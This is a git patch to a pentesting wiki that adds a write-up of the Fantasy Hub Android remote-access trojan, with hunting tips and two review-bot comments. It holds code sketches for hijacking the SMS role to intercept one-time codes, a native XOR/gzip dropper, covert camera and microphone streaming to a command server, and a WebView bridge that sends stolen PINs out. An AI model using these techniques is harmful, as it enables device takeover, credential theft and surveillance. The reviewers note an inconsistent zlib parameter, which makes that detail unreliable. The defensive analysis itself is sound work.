From bc302331cfb517417fb5818c68779d25e903eb1e Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 7 Nov 2025 12:41:57 +0000 Subject: [PATCH] Add content from: Fantasy Hub: Another Russian-based RAT-as-a-Service (MaaS) --- .../mobile-phishing-malicious-apps.md | 126 ++++++++++++++++++ .../css-injection/less-code-injection.md | 7 +- 2 files changed, 131 insertions(+), 2 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md index 7ca3e849fb4..1819240e7ce 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md @@ -63,6 +63,9 @@ ## Useful Frida Snippet: Auto-Bypass Invitation Code +
+Frida hook to bypass invitation code + ```python # frida -U -f com.badapp.android -l bypass.js --no-pause # Hook HttpURLConnection write to always return success @@ -82,6 +85,8 @@ Java.perform(function() { }); ``` +
+ ## Indicators (Generic) ``` @@ -228,6 +233,9 @@ Attackers increasingly replace static APK links with a Socket.IO/WebSocket chann Typical client flow observed in the wild: +
+Socket.IO client flow to assemble APK from chunks + ```javascript // Open Socket.IO channel and request payload const socket = io("wss:///ws", { transports: ["websocket"] }); @@ -248,6 +256,8 @@ socket.on("downloadComplete", () => { }); ``` +
+ Why it evades simple controls: - No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames. - URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO. @@ -274,6 +284,9 @@ Attackers present a WebView pointing to an attacker page and inject a JavaScript Minimal pattern: +
+Android dropper Activity (PackageInstaller Session API) + ```java public class DropperActivity extends Activity { @Override protected void onCreate(Bundle b){ @@ -303,6 +316,8 @@ public class DropperActivity extends Activity { } ``` +
+ HTML on the page: ```html 
@@ -429,6 +444,115 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - Detect installation/launch of an external NFC-relay app triggered by another app. - For banking: enforce out-of-band confirmations, biometrics-binding, and transaction-limits resistant to on-device automation. +## Fantasy Hub RAT-as-a-Service – tradecraft to reuse (Android) + +Fantasy Hub is a MaaS Android RAT focused on phishing-driven installs and post-consent device takeover. The following techniques generalize to other campaigns. + +### Privilege consolidation via default SMS handler +Requesting the default SMS role yields broad messaging control in a single consent step (OTP/2FA interception, silent forwarding/sending, notification reply/delete), avoiding multiple runtime prompts. + +Minimal request flow: +```java +Intent i = new Intent(android.provider.Telephony.Sms.Intents.ACTION_CHANGE_DEFAULT); +i.putExtra(android.provider.Telephony.Sms.Intents.EXTRA_PACKAGE_NAME, getPackageName()); +startActivity(i); // Shows system chooser to set this app as default SMS +``` +Once granted, abuse `ContentResolver` on `content://sms/*`, `SmsManager`/`Telephony` APIs, and notification listeners/replies to exfiltrate or auto-respond. + +Hunting +- Unexpected ACTION_CHANGE_DEFAULT prompts from non-messaging apps. +- Apps that immediately enumerate `content://sms` upon gaining foreground focus. + +### Native dropper: XOR + gzip (zlib windowBits=31) staged payload +Fantasy Hub ships an encrypted/gzipped secondary payload in assets (e.g., assets/metadata.dat) and unpacks only at runtime from native code (libmetamask_loader.so), reducing static IoCs and frustrating Java-only hooks. + +Unpacker sketch: +```c +// key is a fixed 36-byte pattern; repeat across buffer +void xor_dec(uint8_t *buf, size_t n, const uint8_t *key, size_t klen){ + for(size_t i=0;i zlib+gzip, raw= -15 + // ... 
feed in->out until Z_STREAM_END (omitted for brevity) + inflateEnd(&s); + return 0; +} +``` +Flow: read assets/metadata.dat → XOR-decrypt → zlib inflate (windowBits=31) → write decoded payload to disk → execute (e.g., load DEX/ELF or spawn component). Samples include environment checks (root/emulator) before decode. + +Hunting +- assets/metadata.dat + native library with strings referencing inflateInit2/31. +- lib name patterns like libmetamask_loader.so; JNI that reads assets then writes opaque bytes to app-private files. + +### Covert live A/V via WebRTC +The RAT downloads WebRTC libs at runtime, then establishes a peer connection to stream camera/mic in real time. A tiny foreground notification (e.g., “Live stream active”) keeps the service alive. + +Minimal pattern: +```java +PeerConnectionFactory f = createFactory(); +PeerConnection pc = f.createPeerConnection(iceServers, observer); +VideoSource vs = f.createVideoSource(false); +VideoCapturer cap = createCameraCapturer(); cap.initialize(...); cap.startCapture(w,h,fps); +AudioSource as = f.createAudioSource(new MediaConstraints()); +pc.addTrack(f.createVideoTrack("v0", vs)); +pc.addTrack(f.createAudioTrack("a0", as)); +// Signal SDP/ICE over HTTP to C2 +``` +Hunting +- Non-Google origins hosting libwebrtc binaries for download by untrusted apps. +- Foreground services with persistent minimal notifications while camera/mic are active. + +### Multi-brand impersonation with activity-alias + permissive WebView +One APK exposes many launcher icons/labels via activity-alias all pointing to a single entry Activity that renders a WebView overlay window for a bank/brand and bridges credentials to native. 
+ +Manifest sketch: +```xml + + + + + + + + +``` +Permissive WebView with JS bridge: +```java +wv.getSettings().setJavaScriptEnabled(true); +wv.addJavascriptInterface(new Object(){ + @android.webkit.JavascriptInterface public void submit(String user, String pin){ exfil(user,pin); } +}, "bridge"); +wv.loadUrl(phishUrlFromC2); +``` +Hunting +- Dense activity-alias usage creating multiple launcher entries per APK. +- WebView with @JavascriptInterface in non-browser apps + dynamic title/icon changes. + +### Telephony abuse, notifications, and kill-switch +- USSD/calls: silently dial via tel: URIs/TelecomManager and select SIM slot; initiate USSD flows (e.g., tel:*123%23). +- Notification control: auto-reply/delete notifications programmatically to intercept or hide evidence. +- Self-destruct: disable receivers/services/components, cancel alarms, and wipe app data on command to reduce forensics. + +Selected command names observed: addContact, getContacts, sendSms, getCallLogs, createImagesZip, downloadMediaFile, webrtc_stream, requestSystemAsset (sensor capture), replyToNotification, deleteNotification, sendUssdWithChoice, executeCommand (dial/USSD), selfDestruct. + +### Defender triage and hunting tips (Fantasy Hub) +Static +- Native loader lib (e.g., libmetamask_loader.so) + assets/metadata.dat; JNI calls to inflateInit2(…, 31). +- Manifest with heavy activity-alias usage and a permissive WebView exposing a JS bridge. + +Behavioral +- Prompt to become default SMS app right after first launch; bursty ZIP/media exfiltration; silent USSD/calls; tiny persistent “Live stream active” notification during A/V capture. +- Runtime download of WebRTC binaries from non-Google origins. + +Network/Config +- Plain HTTP C2 with endpoints for media ZIPs and signaling; Telegram bot tokens/chat IDs embedded in resources or SharedPreferences for alert routing. 
+- Presence of SharedPreferences keys such as invisible_intercept_enabled; services sampling accelerometer/gyro/light/proximity and beaconing device posture/state. + + ## References - [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign) @@ -440,5 +564,7 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) - [Socket.IO](https://socket.io) +- [Fantasy Hub: Another Russian-based RAT-as-a-Service (MaaS)](https://zimperium.com/blog/fantasy-hub-another-russian-based-rat-as-m-a-a-s) +- [Zimperium IOC – Fantasy Hub (2025-11)](https://github.com/Zimperium/IOC/tree/master/2025-11-FantasyHUB) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md index b9d599deb30..6d338df2b68 100644 --- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md +++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md @@ -1,4 +1,6 @@ -## LESS Code Injection leading to SSRF & Local File Read +# LESS Code Injection leading to SSRF & Local File Read + +{{#include ../../../banners/hacktricks-training.md}} LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used. 
@@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \ * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04) * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/) -* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) \ No newline at end of file +* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) +{{#include ../../../banners/hacktricks-training.md}}
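Review bot: in the first hunk of src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md (@@ -63,6 +63,9 @@), the collapsible block added around the Frida snippet keeps the existing ```python fence, but the body is JavaScript: the comment runs it as `frida -U -f com.badapp.android -l bypass.js --no-pause` and the code is `Java.perform(function() { ... });`. Since this hunk is already touching the wrapper, change the fence to ```javascript so highlighting and any fence-aware tooling treat it correctly. The blank `+` line between the summary line and the opening fence is needed (an HTML block is only closed by a blank line, otherwise the fence is swallowed into it), so keep it; the same applies to the Socket.IO and dropper wrappers added in the @@ -228 and @@ -274 hunks, which do have it.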
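Review bot: in the Fantasy Hub hunk of mobile-phishing-malicious-apps.md (@@ -429,6 +444,115 @@), the "Minimal request flow" under "Privilege consolidation via default SMS handler" only shows the legacy `Telephony.Sms.Intents.ACTION_CHANGE_DEFAULT` intent; on Android 10+ the documented path is `RoleManager.createRequestRoleIntent(RoleManager.ROLE_SMS)` (the legacy intent may still be honored on some builds, but current samples can use the role API), and the hunting bullet "Unexpected ACTION_CHANGE_DEFAULT prompts from non-messaging apps" would miss those. Suggest showing both request paths and adding a bullet for ROLE_SMS requests / SMS role-holder changes. Also, the "Native dropper" subsection is internally inconsistent about the zlib mode: the heading and the static hunting bullet ("inflateInit2/31") say windowBits=31, which is 15+16 and decodes gzip only, while the comment in the C sketch describes "zlib+gzip", which is the 15+32 (=47) auto-detect mode. Pick the value the sample actually uses and make the heading, the `inflateInit2` comment and the IoC bullet agree, otherwise a YARA/strings hunt keyed on the wrong constant misses the loader.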